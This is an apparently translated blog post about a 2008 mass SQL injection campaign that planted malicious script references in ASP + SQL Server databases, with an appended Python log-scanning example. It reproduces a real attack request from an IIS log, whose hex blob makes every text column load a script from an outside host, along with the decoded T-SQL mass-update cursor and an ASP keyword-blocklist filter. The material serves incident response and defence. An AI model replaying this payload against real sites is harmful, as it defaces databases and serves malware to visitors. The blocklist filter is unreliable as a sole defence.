A solution to the currently popular database horse-hanging (SQL injection) attack

Source: Internet
Author: User


Some time ago, individual tables in the database of one of the company's major websites were repeatedly modified and hung with a horse (injected with references to malicious scripts). The site had been built by other people and the code was a little messy, so I only looked at the code of the files that work with those tables. The likely cause was that dangerous characters were not filtered when parameters were received, so I added a Format function to the parameter handling and had the database connection file replace ";" in the received parameters with a substitute character. A day later the horse was hung again; the semicolon substitution had not worked.

I then searched and found that since March there have been many examples of databases hung with a horse through SQL injection, so this method seems to be popular right now. It only targets ASP + SQL Server websites, and only a site whose code has a SQL injection vulnerability can be hung with a horse this way. It only affects text-type fields such as char/text; the modified data generally references scripts such as js, 1.js or b.js, and the site those scripts are loaded from changes frequently.





With no other option, I could only look for a way to prevent SQL injection. I found the following code online; add it to the database connection file:

    <%
    Response.Buffer = True
    Const EnableStopInjection = True

    If EnableStopInjection = True Then
        If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
        If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
        If Request.Form <> "" Then Call StopInjection(Request.Form)
    End If

    Sub StopInjection(Values)
        Dim regEx
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        ' Characters and SQL keywords treated as an injection attempt; adjust to your needs (see the note below)
        regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists)[\s\b+]*)"

        Dim sItem, sValue
        ' Check every value in the submitted collection (query string, cookies or form)
        For Each sItem In Values
            sValue = Values(sItem)
            If regEx.Test(sValue) Then
                Response.Write "SQL injection risk detected, please confirm the information you submitted."
                Response.End
            End If
        Next
        Set regEx = Nothing
    End Sub
    %>

Note: set the values in regEx.Pattern according to your own needs; if they are set improperly, ordinary submitted information will also trigger the SQL injection warning.





Since adding this code, the site has not been hung with a horse again.

A few days ago I obtained the IIS log from the hosting provider and, looking through it, found the specific URL and method used for the SQL injection, as follows:





2008-06-23 16:01:31 get/xxx.asp Id=90;declare%20@s%20varchar (4000); Set%20@s=cast ( 0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7 220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e 73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e7874797 0653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f7220464554434820 4e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d30292042454 7494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e56455254285641524348415228 34303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f7777772e616477626e722e636f6d2f622e6a733e3c2f7 363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736 F7220%20as%20varchar (4000)); EXEC (@S);---201.8.166.17 mozilla/4.0+ (compatible;+msie+7.0;+windows+nt+5.1;+.net+clr+2.0.50727)-www.xxx.com 200 0 271 1432 406





The hex-encoded part in the middle of that request decodes to:





    DECLARE @T varchar(255), @C varchar(255)
    -- Cursor over every text-type column of every user table
    -- (xtype 'u' = user table; 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
    DECLARE Table_Cursor CURSOR FOR
        SELECT a.name, b.name
        FROM sysobjects a, syscolumns b
        WHERE a.id = b.id AND a.xtype = 'u'
          AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T, @C
    WHILE (@@FETCH_STATUS = 0)
    BEGIN
        -- Append the hang-horse content to the existing value of each column
        EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(varchar, [' + @C + '])) + ''"Hang Horse content"''')
        FETCH NEXT FROM Table_Cursor INTO @T, @C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor





Moreover, this SQL injection is attempted every few minutes with a constantly changing IP, so its real source simply cannot be found; it is obvious how despicable such people are.

If your site's IIS log is large, consider using the "IIS Web Log Import Analysis tool" that Chxwei wrote a few days ago to help with querying and analysis.





Finally, to conclude, if the database has been modified and hung with a horse:

1. First check the IIS log to find which pages are being injected, then modify the code of those pages to prevent SQL injection.

2. If you have no IIS log and cannot find the pages being exploited, add the code above to the database connection file.
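Step 1, finding the injected pages in the IIS log, as an added Python example; it is not from the article or from the analysis tool it mentions. The log lines and the hex payloads are constructed and harmless, and the W3C field order date time cs-method cs-uri-stem cs-uri-query c-ip is an assumption about the log configuration.

```python
import re
from urllib.parse import unquote_plus

# Constructed payloads (hypothetical, harmless text) encoded the way the
# injection requests encoded theirs: hex bytes inside CAST(0x... AS varchar).
HEX1 = "DECLARE @T varchar(255) -- constructed sample 1".encode("latin-1").hex()
HEX2 = "DECLARE @T varchar(255) -- constructed sample 2".encode("utf-16-le").hex()

# Constructed IIS W3C log lines (not from the article). Assumed field order:
# date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs-host sc-status ...
SAMPLE_LOG = f"""\
2008-06-23 16:01:31 GET /xxx.asp Id=90;declare%20@s%20varchar(4000);set%20@s=cast(0x{HEX1}%20as%20varchar(4000));exec(@s);-- 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+7.0) www.example.com 200 0 0 271 1432 406
2008-06-23 16:02:10 GET /news.asp Id=12 203.0.113.9 Mozilla/4.0+(compatible) www.example.com 200 0 0 271 800 15
2008-06-23 16:03:05 GET /view.asp id=7;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{HEX2}%20AS%20NVARCHAR(4000));EXEC(@S);-- 198.51.100.4 Mozilla/4.0 www.example.com 500 0 0 100 900 20
"""

# A second statement chained after ';' is the signature of the stacked-query
# injection described above; CAST(0x.. AS [n]varchar) is how the SQL was hidden.
STACKED = re.compile(r";\s*(declare|exec|update|insert|delete|drop)\b", re.IGNORECASE)
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?)varchar", re.IGNORECASE)

def analyze(line):
    """Return a finding for one W3C log line, or None if it is not a request line."""
    parts = line.split()
    if len(parts) < 6 or parts[0].startswith("#"):  # skip #Fields/#Software headers
        return None
    query = unquote_plus(parts[4])  # cs-uri-query; IIS encodes spaces as %20 or +
    finding = {"page": parts[3], "ip": parts[5], "injected": False, "payload": None}
    if STACKED.search(query):
        finding["injected"] = True
    m = HEX_CAST.search(query)
    if m:
        finding["injected"] = True
        codec = "utf-16-le" if m.group(2).lower() == "n" else "latin-1"
        try:
            finding["payload"] = bytes.fromhex(m.group(1)).decode(codec)
        except ValueError:  # odd-length hex or bad UTF-16: keep the flag, drop the text
            finding["payload"] = None
    return finding

def injected_pages(log_text):
    """Map each attacked page (cs-uri-stem) to the set of source IPs that hit it."""
    hits = {}
    for line in log_text.splitlines():
        f = analyze(line)
        if f and f["injected"]:
            hits.setdefault(f["page"], set()).add(f["ip"])
    return hits
```

The pages returned by injected_pages are the ones whose code needs fixing first; the decoded payload shows what the attacker tried to run, which is useful when deciding which tables to check for injected content.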





Where SQL injection occurs there must be a vulnerability in the site code, so standardizing the code is the priority.





Source: http://www.chxwei.com/article.asp?id=359




